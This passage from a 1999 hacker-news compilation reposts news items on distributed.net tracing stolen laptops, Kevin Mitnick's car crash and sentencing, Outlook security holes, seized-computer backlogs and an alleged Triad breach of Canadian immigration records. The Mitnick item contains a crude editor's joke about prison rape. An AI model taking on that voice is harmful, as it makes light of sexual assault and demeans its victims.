Mike who baby-sits every day after school and during the summer to make a buck. But he wonders if he can work for the NSA, given that he disagrees with some its policies. "I would have to think long and hard before I did it," Mike says. @HWA 27.0 Distributed.net Fingers Thief ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench On two separate occasions stolen laptops where recovered with the help of the distributed.net RC5 client. The idiotic thieves did not reformat the hard drives of the stolen systems like they should have and instead started using them on the internet with the original software installed. Distributed.net was then able to match the original email address from the clients with the machines new IP numbers to trace the thieves. Wired http://www.wired.com/news/news/technology/story/21431.html Not everyone thinks this is a good thing. Some feel that Distributed.net erred by giving out its web logs without a warrant. MindSec http://www.mindsec.com/misc/distnet.html Wired; Net Address Helps Finger Felons by Andy Patrizio 2:00 p.m. 25.Aug.99.PDT Running the RC5 client on your computer is not only a nifty way to win a few thousand dollars, it could also help find your PC if it is stolen. The RC5 client is used in a contest where people put their PCs to work in an attempt to break RSA Data Securities' 64-bit encryption. On two occasions, computers running the RC5 client were stolen, but the crooks were caught because they didn't realize that the computers could be traced. RSA, a leading developer of data encryption, issued a US$10,000 challenge two years ago to break its 64-bit encryption security. There are 18 quintillion key possibilities with 64-bit encryption, and after two years and 197,000 participants, only 11.8 percent of the keys have been tested. RC5 runs during idle CPU cycles. It periodically connects to Distributed.net servers to return processed encryption keys and to retrieve new ones. When the thieves started to use the computers, RC5 continued to process keys and connect to Distributed.net servers, sending in completed work and fetching new keys. And when the stolen computer communicated with the server, it logged in using the thief's IP address. The Distributed.net administrators tracked down the IP address back to the thieves' ISPs, and in turn were able to determine who was using that IP address when the keys were sent. In separate incidents, in May 1998 in Sweden, and this year at Oregon State University in Corvallis, Oregon, police were able to recover the computers, said David McNett, a programmer who runs Distributed.net. "We have a joke in the admin channel that Distributed.net is like LoJack for your computer." LoJack is a device placed in cars that allows police to determine their location if the vehicles are stolen. "It's certainly an unanticipated side effect of running the client, but a good one." The other side of the coin Mindsec; Wired News Article http://www.wired.com/news/news/technology/story/21431.html Mindsec.com has noted that services like distributed.net, and Seti@home, that let you have a background client running, which will periodically send in your finished blocks, or some data that they are processing, as well as the IP you came from, and your email address. It sends the email address you provide to it for statistics and tracking purposes. When that is done, binded to your IP address, it effectively lets them see where you are coming from. Well that is not a problem, that is fine. Except when two things happen, the first would be when distributed.net, without being served a warrant, just gives logs to a regular person, who wants them. It is great that the person got their stolen computer back, and the person who stole it was arrested, however it should have gone through legal channels, and they should have been served a warrant. The second, what if they are served a warrant to track someone? Well, there is nothing you can do about that, except to use a fake email address, or an account that you never access from anywhere else, and use a proxy server to connect to them. If you just use a fake email account, and use it ONLY with distributed.net, you would be OK, since there is no way someone would know what that account is. However if someone found it, poof, you have been tracked. These are things you should keep in mind, they are important and serious. They are a big part in computer privacy, and Mindsec.com fully support Computer Privacy, and Privacy in general. When we spoke to the administrative contact at distributed.net, he said that they gave out the logs just to help them out. he also stated "The logs are no different than any web server that logs your IP". I corrected him in the fact that web servers do not cross reference to a database of email addresses. I am sure they meant no harm, and I hope they will realize that this is bad and never do it again. They were contacted by the people who had their computers stolen, and they did the research for them. It is unclear if it was distributed.net who spoke to the ISP of the thief, or if it was turned over the the police first. Late Addition: Just to clarify to the people who are mailing and saying that they don't see the problem. Go sign up to be on distributed.net. What authentication does it do to find out who you are? None, so how can someone go after the fact and try to say "Well that is me". I am sure I could say "I am Joe Johnson, my laptop got stolen, this is my email address, could you give me the logs?". If distributed.net even asked for any kind of verification of who they were, besides their email address, and sending email to the same account that the rc5 client was using, how is that secure verification? If "Hacker X" wanted to track down "Hacker B", they hack that persons account, and if that was already enough to track them, they could find them in almost real time, to their IP address, thanks to distributed.net. I like the idea behind distributed computing, most people like the idea. But the way it logs and such are serious, it either needs real verification, via pgp of some sort.. I would say they need to just not give out their logs without a warrant, but nobody can trust them after this. @HWA 28.0 Hacktivism Email List ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by grugnog An email list to discuss news about recent hactivists events and analysis about hacktivism and for discussion possibly leading to a better understanding of what 'hacktivism' means (as a word and in a tactical, ethical and practical sense). Hacktivism list http://www.tao.ca/~grugnog/hacktivism/ @HWA 29.0 Mitnick in Car Accident ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by maverick212 While being transported from the San Bernardino Jail to the Los Angeles Metropolitan Detention Center the vehicle Kevin Mitnick was riding in was involved in a multi car pile up. The accident occurred on Highway 60 between 8:30 and 9 a.m.. Kevin was thrown against a metal divider within the vehicle and suffered minor head and neck injuries. Although Kevin and the other prisoners were shackled in chains no seat bealts were used. After the accident Kevin was transported back to the San Bernardino Jail. FREE KEVIN http://www.freekevin.com/ Wired http://www.wired.com/news/news/politics/story/21455.html Mitnick Hurt in Car Crash by Douglas Thomas 4:30 p.m. 26.Aug.99.PDT LOS ANGELES -- Convicted hacker Kevin Mitnick sustained minor head and neck injuries Wednesday morning in a multi-car accident while he was being transferred to a facility that satisfied his dietary requirements. Mitnick, being transferred in anticipation of a court ruling which would order Mitnick moved to a facility that served kosher meals, was thrown against a metal divider. See also: Life Not Kosher for Mitnick Mitnick and an unknown number of other inmates -- shackled in chains but with no safety restraining devices -- were being transported from the San Bernardino Jail to the Los Angeles Metropolitan Detention Center. The crash occurred on Highway 60 between 8:30 and 9 a.m. "I really slammed my head when I hit the metal divider," Mitnick said in a telephone interview on Thursday. X-rays proved negative, although Mitnick continues to complain of headaches, nausea, and shoulder and neck pain. Insult soon added to his injuries: After spending several hours waiting to be admitted to the MDC, Mitnick was transferred back to the San Bernardino facility, which does not serve kosher food. Mitnick wound up spending most of Wednesday night waiting on the floor of a holding cell to be readmitted. He was finally booked into the facility at 3:30 a.m. Thursday. Mitnick said he has yet to be seen by a San Bernardino facility nurse, and has had no access to any painkiller, including Tylenol. "I don't think they have any idea what happened," Mitnick said, referring to the lack of medical attention. Although unwilling to comment on legal action regarding the accident, Mitnick's attorneys did say that they immediately sent a letter to the U.S. Marshals Service requesting that Mitnick be moved to a federal facility. They say a federal facility could provide him access to kosher food and to medical treatments in keeping with federal guidelines. U.S. Marshals were unavailable for comment. "This has definitely been one of the worst days in custody," Mitnick said. (If that was his worst day he's been doing alright, noone has made him their girlfriend yet ... - Ed) @HWA 30.0 Hong Kong Police Create Computer Crime Squad ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The Hong Police have announced plans to form the Computer Crime Investigation Cadre to help tackle computer crime at district levels. Members of the squad will be selected from officer training course being run by the Commercial Crime Bureau. South China Morning Post http://www.technologypost.com/enterprise/Daily/19990826112510135.asp?Section=Main Published on Thursday, August 26, 1999 ENTERPRISE HK police to establish computer crime team NEWSBYTES The Hong Kong police yesterday announced plans to form a special team of officers with expert knowledge in the area of computer crime to help battle criminals that are increasingly turning to electronic means to commit crimes. The new squad will consist of an unspecified number of officers who will be called in to help colleagues when criminals employ sophisticated computer techniques in committing their crimes. "The surge in computer use, the increase of related criminal cases and other emerging issues in various regions over the past year have resulted in a challenge which the 17 members of the section now find it difficult to cope with, without resorting to help from their Force colleagues," explained Commercial Crime Bureau Chief Superintendent, Victor Lo Yik-kee. "That is what Cadre members will be for," added Mr Lo. "Once qualified and recognised, they can help provide support services to their own formations in handling cases of computer-related crimes while officers of the Section can continue to play the role of a co-ordinator and provide assistance when needed." The first members of the squad are expected to be recruited by September. The Commercial Crime Bureau is already running a training course for officers from across the course, said the force, and this course is being used to select members of the new Computer Crime Investigation Cadre which will help tackle computer crime at District levels. The training course follows a similar two day meeting at the Police Training School in July when over 180 officers of different ranks and members of the Immigration Department and the Customs and Excise Department attended seminars on computer crime and undertook a written test to judge their knowledge of the subject. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 31.0 Outlook Holes Demonstrated at USENIX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Richard Smith, president of Phar Lap Software, recently gave a presentation at the 8th Usenix Security Symposium detailing over a dozen major holes in Windows Outlook. Some holes would give infocriminals complete access to your desktop computer. Wired http://www.wired.com/news/print_version/business/story/21442.html?wnpg=all Locking Windows' Backdoors by Declan McCullagh 3:00 a.m. 26.Aug.99.PDT WASHINGTON, DC -- If you use Microsoft Outlook, be warned. Over a dozen bugs in Windows 98 let malicious virus writers and meddlesome peeping Toms view or erase any file on your hard drive. At a computer security conference Wednesday afternoon, an expert demonstrated how malcontents can send apparently innocuous email with hidden commands that -- if opened using certain email programs -- will give an intruder complete access to a Windows computer. See also: Same Hole, Different Exploit "We've got some serious problems here, folks. We've got some really bad backdoors on the computers we have on our desktops," said Richard Smith, president of Cambridge, Massachusetts-based Phar Lap Software, who identified the person accused of writing the Melissa virus. During his presentation at the 8th Usenix Security Symposium, Smith demonstrated some new security flaws he and his collaborators have identified in their spare time. One recently unearthed and not-yet-fixed Win98 glitch lets an email opened in Outlook execute any DOS command -- including reformatting your hard drive or uploading its contents to a remote Web site. The solution? Consumers could switch to a non-Microsoft operating system. Another option, Smith suggested, is for customers to begin asking computer companies to turn off features that let email messages execute other programs. "It's prudent to avoid systems in which we can have executable content," said Peter Neumann, the conference's keynote speaker and a researcher at SRI International. "There is no way you can have any assurance whatsoever that it will work." Many of the problems security experts have identified stem from the design choices Microsoft made when developing Windows 95 and 98, which are much more vulnerable to intrusions than Linux, Unix, or even Macintosh systems. One gaping security hole is Microsoft's complicated ActiveX technology, which lets remote Web pages or email messages execute programs that manufacturers claim are trustworthy. But sometimes they're not. With a little programming, a nefarious person can send email or create a Web page that activates Active X functions that delete files, modify them, or even send their contents to any address on the Internet. As security experts have identified these flaws, Microsoft has tried to fix them, and Smith said some have been eliminated from early versions of Windows 2000. But the millions of people using current versions of Windows 98 and Outlook are still at risk, he said, unless they switch off ActiveX. Not only Microsoft is to blame. Netscape has acknowledged security glitches in its browser. Unrepaired versions of Qualcomm's Eudora 4 let executable programs masquerade as links. Computer makers, too, have been shipping buggy software. Hewlett Packard has included two ActiveX controls on about 5 million Pavilion computers, Smith said, that let HTML email messages opened in Outlook or Eudora take control of the computer. An intruder can silently insert a virus, disable security features, view documents, or crash the system. Some Compaq Presario computers suffer from a similar security risk. As configured from the factory, the computers trust all applications provided by Compaq -- one of which can execute whatever program an email message orders it to run. "Compaq gave every hacker in the world a way to run programs," Smith said. To improve the security of Outlook, go to the Security tab in the program's Options dialog box and select "restricted sites zone." Then, in the Internet Options Windows control panel, go to "Restricted sites/Custom level" and scroll down and disable "Active Scripting." @HWA 32.0 Feds Overflowing with Siezed Equipment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by netmask Hundreds of computer systems are piling up and cases are going untried because the FBI lacks the resources to examine confiscated equipment. Under federal law investigators may keep property seized as possible evidence until the statute of limitation for the given crime expires, generally five years for computer crime cases. New York Times- Registration Required http://www.nytimes.com/library/tech/99/08/cyber/cyberlaw/27law.html Investigators Face a Glut of Confiscated Computers By MATT RICHTEL hen the FBI raided the family home of Paul Maidman, 18, in late May, they seized his computer as possible evidence of online criminal activity and took it to a high-tech forensics lab in Dallas. The Waldwick, N.J., teenager, who has yet to be arrested or charged with a crime, is concerned that it could take a long time to learn his fate -- and that of his computer. The FBI and prosecutors on cases like Maidman's say he could be waiting a while. Maidman is one of hundreds of people whose computers are in federal and state custody. Law enforcement officials say they lack the time, resources and sometimes expertise to examine all of the PCs that are piling up. For example, at the headquarters of a federal cybercrime task force in Dallas, more than 100 hard drives await examination, but only three forensics experts are available to look at them, said Paul E. Coggins, the United States Attorney in Dallas. The computers were seized in cases involving a range of alleged crimes, including fraud, embezzlement, child pornography and computer break-ins. "We've had hackers who are ready to plead guilty, but we're slowed down because we lack the resources" to scour through the evidence, Coggins said, adding that few forensics agents have been trained to find and understand incriminating data on hard drives. "It's hard to find people to begin with who not only have the interest but the competence," he said. It is unclear how widespread this problem is among state and federal agencies. But Coggins said that numerous agencies, both state and federal, seek the advice and assistance of the three forensics investigators in Dallas, suggesting there is insufficient expertise in many jurisdictions. "We are desperate for resources to process these cases," said Matthew E. Yarbrough, an assistant United States Attorney based in Dallas who is one of 25 federal prosecutors assigned by Congress to pursue cybercrime cases full-time. Supporters of hackers and the hacker ethos, which champions non-malicious computer tinkering, say the situation is worrisome. They fear that computer users who are innocent, or who may never be charged with a crime, may be deprived of thousands of dollars worth of equipment far longer than necessary. As evidence, they point to a recent study by a senior fellow at the Electronic Privacy Information Center which found the prosecution rate for computer crime to be lower than that for other types of crime. That suggests to critics that investigators are unfairly targeting innocent people. Federal law enforcement officials counter that, in part because of the complexity of evidence gathering, the computer crimes are complicated to prosecute. When it comes to holding confiscated property, the investigators have the law on their side. Under federal law, they may keep property seized as possible evidence until the statute of limitation for the given crime expires -- with non-capital offenses, generally five years after the crime is committed. Defense lawyers concede it is not unusual for law enforcement to keep property as possible evidence in an ongoing investigation for several years. "It's not abnormal, but it is a big deal for the innocent person whose expensive equipment is taken from them," said Jennifer S. Granick, a San Francisco lawyer who represents hackers. "Whether the seizure of the property is justified, we can't know now," she said. "But in time, when the affidavits are unsealed, then we'll know whether there was good cause or sound reason to deprive these people, or whether the seizures are part of anti-hacker hysteria." The issue dates back to a debate in 1990 over a government investigation called "Operation Sun Devil," targeting members of the Legion of Doom, a hacker group. As part of the investigation, agents confiscated computers at Steve Jackson Games, a small company in Austin, Tex., in search of a rule book for a game. Investigators thought the book might be a how-to guide for computer criminals. Without his computers, Jackson was nearly forced out of business. He took the Secret Service to court and won on two of three counts, forcing the Secret Service to pay more than $300,000 in damages and legal fees. Today, federal investigators say they make an effort to return computers to a business whose equipment may have been used by an employee without its knowledge, or machines that are needed to keep a legitimate business in operation. One way investigators accomplish this is by taking a snapshot of the hard drive, copying all of the data and then returning the original to its owner. But Yarbrough, the assistant United States Attorney, said returning personal computers to people suspected of wrongdoing is another matter. He said their computers may be instruments used in a crime, and would not be returned any more than a gun would in a similar situation. Yarbrough said that it is not a valid use of limited government resources to spend time copying the hard drives of a suspect's computer just to be able to return it to them. "We don't give the gun back to a bad guy, and we don't give the computer back to a bad guy," he said. But Ms. Granick disagreed, arguing that while it is necessary to hold a gun as evidence, hard drives are different. "You can't copy the gun and have it be good evidence in court. You need to have the actual gun," she said. Hackers and others are allowed under federal law to petition the government to return their property. But some say they worry that if they do so, they risk irritating investigators and making things harder on themselves. "I don't want to make any problems," said Maidman, the 18-year-old from New Jersey. "I'd really like my stuff back, but I don't want to upset them." Maidman's home was raided in June during a broad sweep by federal agents against computer criminals and phone "phreakers" -- people who hijack time and resources from phone companies. At the time, Coggins's office issued 16 warrants in 12 jurisdictions; the FBI said at the time that the investigation targeted the theft of passwords and credit cards, among other possible charges. Coggins said the investigation is ongoing. But he said the government also has to set priorities, and that with limited resources, the hacking cases sometimes take a back seat to economic espionage or other major crimes that require high-tech forensics research. The federal government is not alone in its frustration. State governments say they too are toiling under limited resources and expertise in dealing with computer-based evidence. Kevin Higgins, chief Deputy Attorney General for the state of Nevada, said that the spread of computers among more ordinary criminals is making matters worse; even methamphetamine dealers carry electronic organizers with the names of their associates, he said. "These days there's a debate over whether even to seize computers," he said. "You've pretty much got to have a room just to store them in." Carl S. Kaplan is on vacation. @HWA 33.0 Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.epic.org/staff/banisar/hacker.html Computer Hacker’s Sentence Spotlights High-Tech Crime Prosecutions By David Banisar, Contributing Editor Criminal Justice Weekly, Notorious computer hacker Kevin Mitnick, once described as "Cyberspace’s Most Wanted," is scheduled to be sentenced this month in U.S. District Court (C.D. Cal) to 46 months in prison after pleading guilty to computer fraud and abuse in April 1999 for breaking into dozens of computers around the United States. The sentencing will end a five-year, highly publicized chase and prosecution of the best-known hacker in the country. It raises many questions about the ability of law enforcement to handle cases involving new technologies and the prosecutions of those accused of computer crimes. Cyberspace’s Most Wanted? The case has been the subject of worldwide media attention, which Mitnick’s supporters say has blown his exploits out of proportion. The New York Times led the coverage, describing him in a 1994 front-page story as "Cyberspace’s Most Wanted." The Times stories increased interest in the case, and Mitnick was tracked down and arrested in North Carolina in 1995. He was charged with 25 counts of computer fraud, wire fraud, and wiretapping, but none of these alleged crimes were mentioned in the Times series. In previous prosecutions, Mitnick’s relationship with computers has been described by mental health experts as "obsessive." In the current federal prosecution and a pending state case in California, he has not been accused of using computers for personal gain. Prosecutors apparently decided to use his case as a warning to others. Since his arrest, he has been held without bail and repeated requests for a bail reduction hearing have been denied. Prosecutors refused to give him access to a computer with the eight gigabytes of evidence they planned to use against him, claiming that he could use it to break into more systems, even without a phone line and modem. He was once put into solitary confinement when prosecutors claimed that he was converting an AM/FM radio into a transmitter. Mitnick pleaded guilty to five felony charges following over four years of pretrial detention. He is now eligible for release to a halfway house, having already served most of his time. The probation office has recommended that unsupervised use of computers, modems, or cellular phones be prohibited as a condition of supervised release. Mitnick still faces a California state charge of computer fraud for telephoning the California DMV in 1992 to persuade an employee there to fax him the driver’s license information of a suspected informant. According to Carolyn Hagin, an attorney at the law offices of famed hippie lawyer Tony Serra, the attorney who is representing Mitnick in state court, an attempt to lower bail from $1 million was denied by a Los Angeles Superior Court judge on July 9, who admitted that media portrayals of Mitnick convinced him to deny bail. Meanwhile, John Markoff, the New York Times reporter whose gripping front-page stories made Mitnick a celebrity, landed a book contract one week after Mitnick’s capture worth a reported $750,000. Takedown, a movie starring Tom Berringer, is scheduled to be released later this year. The Long Arm of the Law The primary federal statute regarding computer crime is the Computer Fraud and Abuse Act (18 USC § 1030). The Act, originally adopted in 1984 and substantially amended in 1986 and 1990, prohibits the unauthorized access or exceeding of the user’s permitted access to computers run by government agencies, financial institutions, or computers used in interstate or foreign commerce, such as those connected to the Internet. It also prohibits releasing viruses or other programs that can secretly access computers and cause damage. The penalties for a first offense range from one year for accessing computers without intending to cause damage and without financial gain, to five years for intentionally damaging computers or stealing information for material gain. A maximum of ten years can be imposed for using the access to obtain information protected "for reasons of national defense or foreign relations." There are several other statutes included in the U.S. Department of Justice Computer Crime Program category: those involving trafficking in access devices such as passwords, cell phone cloning devices, or credit card numbers (18 U.S.C. § 1029), and mail and wire fraud (18 U.S.C. § 1343). Every state also has its own computer statute. Referrals Increasing, Most Cases Rejected Federal agency referrals for prosecution of computer crimes have increased substantially over the past several years, but actual prosecutions are fairly rare. According to U.S. Justice Department data obtained under the Freedom of Information Act by the Transactional Records Access Clearinghouse (TRAC) of Syracuse University, the DOJ prosecuted 83 cases out of 417 referred in 1998 under the Computer Fraud program category. Referrals have more than tripled since 1992 and 1993. Each year between 1992 and 1998, the DOJ has declined to prosecute between 64 and 78 percent of these cases. Forty percent of the cases were declined because of lack of evidence of criminal intent, weak or insufficient admissible evidence, or no apparent violation of federal law. In 1998, 47 persons were convicted of computer crimes and 10 were found not guilty. Twenty were sentenced to prison. That year, the average sentence for those convicted was five months, and over half received no jail time. Since 1992, 196 persons have been convicted and 84 persons have been sentenced to prison for computer crimes. Average sentences imposed for federal computer fraud and abuse violations have ranged from four to 18 months. In most years, over half of those convicted served actual time behind bars. The longest sentence was against profit-oriented hacker Kevin Poulsen, who was sentenced in 1995 to 71 months for manipulating the phone system to win radio contests. Like Mitnick, he was held without bail for five years. In his case, the prosecution initially charged him with obtaining classified information as a justification for denying bail and then dropped the charge before trial. Currently, there is no federal sentencing guideline specifically applicable to the Computer Fraud and Abuse Act (18 U.S.C. §§ 1029-1030). In 1993, the U.S. Sentencing Commission’s Computer Fraud Working Group examined the application of existing federal sentencing guidelines as applied to the statute. The working group found that for most cases, the fraud guideline, Section 2F1.1, adequately addressed most offenses. It recommended against creating a new guideline for computer fraud because of the difficulty in measuring harm, the possibility of charging decisions that could lead to the same actions being prosecuted differently, and the lack of empirical support (case law) for creating a separate guideline. The working group is presently drafting guidelines on losses for software piracy as required by Congress under the No Electronic Theft (NET) Act (PL 105-147, 1997). The FBI claims that there were nearly $400 million in losses between 1996 and 1998 due to computer fraud, but these numbers are difficult to verify. Mark Rasch, a former federal prosecutor and now senior vice-president of Global Integrity Corp., a Virginia computer security consulting firm, notes that the issue of damages in these types of cases "drives the sentencing guidelines" and are "tremendously fact specific." In many cases, the numbers appear to be grossly inflated. In 1990, the federal government brought a case against Craig Neidorf, the publisher of Phrack magazine, an underground online newsletter, for publishing the "source code" to BellSouth’s emergency 911 system. Prosecutors claimed that with the code, which they valued at $57,000, hackers could shutdown the 911 system in the United States. Three days into the trial, Neidorf’s attorneys showed that the document was actually a memo on procedures available for sale from BellSouth’s own catalog for $13, and the case was dropped. BellSouth had included in its figures the cost of the workstation used to write the memo and the salary of the author. In Mitnick’s case, the companies whose computers he broke into, including Sun Microsystems and Nokia, claim that he caused nearly $300 million in damages by accessing their systems and stealing software. Several of the companies listed the entire cost for developing the software, rather than actual losses. Recently, Sun Microsystems, which claimed Mitnick stole source code worth $80 million, recently began selling the same code to students and software developers for $100. Phil Karn, a senior engineer at Qualcomm Inc., a San Diego-based cellular phone manufacturer, whose offices were broken into by Mitnick, told the Los Angeles Times that "the real damage was loss of productivity and hassles . . . I don’t want to condone what Mitnick did, but he’s really not public enemy No. 1." Assistant U.S. Attorney David Schindler is demanding Mitnick pay $1.5 million in restitution. His sentencing hearing has been put off several times while this issue is being negotiated, but supporters say that without access to computers, Mitnick is unlikely to ever be able to earn enough money to pay restitution, no matter what the amount. A Cyberspace War or a New Red Scare? While Mitnick cooled his heels awaiting trial, a new public fear of computers, and the potential impact of computer hackers on individual lives and national security has emerged. In 1998, President Clinton signed Executive Order PDD 63, Critical Infrastructure Protection. Following the Executive Order, a number of government agencies including the FBI, DOJ, and the National Security Agency (NSA), pressed for limits on security programs that include encryption, which can protect communications from interception, and new powers to access telecommunications providers, such as telephone companies to protect them from cyberattacks. The New York Times reported on July 28 that the National Security Council has proposed a Federal Intrusion Detection Network (Fidnet) that would monitor traffic on the Internet to look for patterns of computer intrusions. Data on the traffic would be stored at the National Infrastructure Protection Center, an interagency task force run by the FBI. Thomas Guidoboni of Michaels, Wishmer and Bonner, Washington, D.C., who has represented several persons accused of computer crimes, says there is a paranoia about hackers. "Everyone is frightened of what they can do. . . . It scares people to think their computers can be broken into." The NSC proposal, which could have profound privacy and civil liberties implications, has been criticized both inside and outside the government and is unlikely to be adopted. But the combination of the growth of the Internet, fear, and bureaucratic demands for more power to protect systems ensure that there will be more prosecutions in the coming years. David Banisar is a Washington, DC, area attorney specializing in computer and communications law. He is the co-author of The Electronic Privacy Papers (John Wiley and Sons, 1997) and a Senior Fellow at the Electronic Privacy Information Center. He is a contributing editor to Criminal Justice Weekly. Editor’s note: Since the publication of this article, Mitnick was sentenced to 46 months in jail and ordered to pay $4,100 in restitution. The pending case against him in the state of California was also dropped. @HWA 34.0 Triads Linked to Info Vandalism - Alleged CoverUp by RCMP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hex_Edit Classified documents from the Royal Canadian Mounted Police allege that Chinese nationals with links the Triads, (Chinese Mafia) have broken into the computer system at Canadian High Commission in Hong Kong. The Computer Assisted Immigration Processing System is supposed to have had over 788 files deleted. The intrusions may have taken place as long as seven years ago. It is believed that the RCMP is covering up the events. National Post http://www.nationalpost.com/home.asp?f=990826/63514 Vancouver Province http://www.vancouverprovince.com/newsite/news/990826/2775271.html National Post; Triads linked to hacking at Canadian mission Files deleted, blank visa forms missing in Hong Kong Fabian Dawson The Province VANCOUVER - Chinese nationals linked to organized crime have broken into the immigration computer at the Canadian High Commission in Hong Kong, classified documents allege. At least 788 files from the Computer Assisted Immigration Processing System (CAIPS) were deleted, and up to 2,000 blank visa forms have disappeared, according to the documents. The core allegation is that certain people paid locally engaged high commission staff to delete their backgrounds in the computer system to hide their links with Triads -- the Chinese Mafia. A related concern is that the stolen visa forms have been used by possibly hundreds of people, including criminals, to enter Canada illegally. For seven years, the RCMP, Immigration Canada and the Department of External Affairs are alleged to have kept a lid on the case, which several sources call a ''breach of national security.'' Two key figures in the investigation suspect the RCMP is covering up criminal acts and negligence at Canada's immigration office in Hong Kong. Details of the case are contained in reports filed by Robert Read, an RCMP corporal in Ottawa, and Brian McAdam, a former immigration control officer at the high commission in Hong Kong. ''I believe there has been a massive conspiracy to cover up the whole issue,'' Cpl. Read said. In a report marked ''Top Secret,'' he wrote: ''The loss of control of CAIPS ... loss of control over immigration from Hong Kong ... from 1986 to 1992 is a most serious breach of national security." Cpl. Read, who has written orders from his boss, Inspector Jean Dube, not to talk to the media, said: ''I am going public because there needs to be a public inquiry into this whole thing.'' Officials would not confirm or deny the existence of an investigation. In fact, the investigation began in 1992, when the Department of External Affairs sent to Hong Kong an electronic data processing officer, David Balser, and RCMP Sergeant John Conohan. According to Cpl. Read and Mr. McAdam, the two carried out a cursory investigation. Neither Mr. Balser nor Mr. Conohan recommended further investigations or criminal charges, despite Mr. McAdam's reports, which indicated security breaches by locally employed staff and the discovery of fake Canada Immigration stamps in one of their desks. Mr. Conohan was also told about local staff who had given themselves unauthorized, top-level security clearance to access the computer, according to one of Cpl. Read's reports. Mr. Conohan reported that the suspect in whose desk the fake stamps were found had fled to Taiwan, despite being given information that she was living in B.C., some of the reports allege. Documents also show that a second suspect, who operated the CAIPS computer, fled her job in September, 1993, because of gambling debts owed to Triads. Mr. Balser's report is described by investigators familiar with the allegations as ''unintelligible bureaucratese.'' He makes no express mention of the deleted files, fake stamps or missing blank visas, which were included in Mr. McAdam's reports. Mr. Balser does talk about the potential for security breaches and recommends that locally engaged staff not be given high security clearance. He hints that someone could misuse blank visas, which were left lying in open cardboard boxes, but does not report allegations that at least 2,000 blank immigrant visas were found to be missing. Mr. Read alleges that Mr. Balser has told him on the record that he was ordered to ''obfuscate'' his report. Mr. Balser is now retired and could not be reached for comment. Unable to get any answers to his concerns, Mr. McAdam continued with his complaints and a series of RCMP investigators were given the case and then abruptly transferred. The Canadian Security Intelligence Service, was also brought in to investigate Chinese espionage and together with the RCMP launched Operation Sidewinder in 1995. That operation, which was to look at the influence of Chinese officials and tycoons at the Hong Kong mission, was also halted. The investigation into the penetration of CAIPS is now being conducted by Sergeant Sergio Pasin of the immigration and passport section of the RCMP. ''If the RCMP does not tell the government that a disaster has occurred, the government cannot decide how to react to it, cannot decide when to tell the people of Canada what has occurred,'' said Cpl. -=- Vancouver Province; 'A breach of national security' Files at Canada's diplomatic mission in Hong Kong were infiltrated Fabian Dawson, Staff Reporter The Province Chinese nationals linked to organized crime have broken into the immigration computer at Canada's diplomatic mission in Hong Kong, classified documents obtained by The Province allege. At least 788 files from the Computer-Assisted Immigration Processing System (CAIPS) were deleted, and up to 2,000 blank visa forms have disappeared, according to the documents. The core allegations are: - That certain people paid locally engaged staff of the Canadian commission (now the consulate-general) to delete their backgrounds in the computer system to hide their links with triads -- the Chinese Mafia. - That the visa forms have been used by possibly hundreds of people, including criminals, to enter Canada illegally. For seven years, the RCMP, Immigration Canada and the department of external affairs are alleged to have kept a lid on the case, unwilling to reveal the extent of what several sources call a "breach of national security." Two key figures in the investigation suspect the RCMP is covering up criminal acts and negligence at Canada's immigration office in Hong Kong. Details of the case are contained in reports filed by Robert Read, an RCMP corporal in Ottawa, and Brian McAdam, a former immigration control officer at the Canadian commission in Hong Kong. "I believe there has been a massive conspiracy to cover up the whole issue," Read said. In a report marked Top Secret, he wrote: "The loss of control of CAIPS . . . loss of control over immigration from Hong Kong . . . from 1986 to 1992 is a most serious breach of national security." Read, who has written orders from his boss, Insp. Jean Dube, not to talk to the media, told The Province: "I am going public because there needs to be a public inquiry into this whole thing." Official spokesmen would not confirm or deny the existence of an investigation. In fact, the investigation began in 1992, when the department of external affairs sent to Hong Kong an electronic data processing officer, David Balser, and RCMP Sgt. John Conohan. Read and McAdam say the two men carried out a cursory investigation. Despite evidence indicating security breaches by locally employed staff and the discovery of fake Immigration Canada stamps in one of their desks, neither recommended further investigations. Conohan was also told about local staff who had given themselves unauthorized, top-level security clearance to access the computer, according to one of Read's reports. The sergeant reported that the suspect in whose desk the fake stamps were found had fled to Taiwan, despite having been given information that she was living in B.C., some of the reports allege. Documents also show that a second suspect, a woman who operated the CAIPS computer, fled her job in September 1993 because of gambling debts owed to triads. Balser's report, a copy of which The Province has obtained, is described by sources familiar with the allegations as "unintelligible bureaucratese." He makes no express mention of the deleted files, fake stamps, missing blank visas or the disappearing local staff. Balser does talk about the potential for security breaches and recommends that locally engaged staff not be given high security clearance. And he hints that someone could misuse blank visas, which were left lying in open cardboard boxes, but does not report allegations that at least 2,000 blank immigrant visas were found to be missing. Read, a Mountie for 24 years, alleged that Balser has told him on the record that he (Balser) was ordered to "obfuscate" his report. Balser is now retired. Unable to get any answers to his concerns, McAdam continued with his complaints. A series of RCMP investigators were given the case and then abruptly transferred. The Canadian Security and Intelligence Service, Canada's spy agency, was brought in to investigate Chinese espionage. Together with the RCMP, CSIS launched Operation Sidewinder in 1995. That operation, which was to look at the influence of Chinese officials and tycoons at the Hong Kong mission, was also abruptly halted. The investigation into the penetration of CAIPS is now being conducted by Sgt. Sergio Pasin of the immigration and passport section of the RCMP in Ottawa. "There is enough evidence in this case and in my other reports to initiate a public inquiry . . . but for some reason nobody wants to do anything," said McAdam. "If the RCMP does not tell the government that a disaster has occurred," said Read, "the government cannot decide how to react to it, cannot decide when to tell the people of Canada what has occurred. "They have Balser's report, McAdam's testimony, the missing files in Hong Kong . . . and my report. "Why won't they do anything?" @HWA 35.0 DoD Preps to Fight InfoCriminals Both 